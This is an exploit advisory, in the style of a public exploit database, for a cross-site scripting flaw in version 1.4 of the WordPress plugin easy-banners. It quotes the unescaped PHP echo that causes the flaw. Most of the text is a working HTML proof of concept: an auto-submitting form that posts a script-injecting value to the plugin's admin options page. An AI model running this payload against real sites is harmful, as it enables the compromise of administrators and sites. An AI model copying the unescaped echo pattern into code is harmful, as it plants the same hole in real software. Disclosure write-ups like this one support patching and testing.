###################### # Exploit Title : Wordpress easy-banners.1.4 Cross Site Scripting # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://wordpress.org/plugins/easy-banners/ # Software Link : http://downloads.wordpress.org/plugin/easy-banners.1.4.zip # Date : 2014-06-28 # Tested on : Windows 7 / Mozilla Firefox ###################### # Location : http://localhost/wp-admin/options-general.php?page=easy-banners.php ###################### # Vulnerable code : <input type="hidden" name="name" id="name" value="<?php echo $row['name']; ?>" /> ###################### Exploit Code: <html> <body> <form name="form1" method="post" action="http://localhost/wp-admin/options-general.php?page=easy-banners.php"> <table class="widefat" style="width: 50%;"> <input type="hidden" name="name" id="name" size="55" maxlength="250" value='"/><script>alert(1);</script>'/> <script language="Javascript"> setTimeout('form1.submit()', 1); </script> </form> </body> </html> ##################### Discovered By : ACC3SS #####################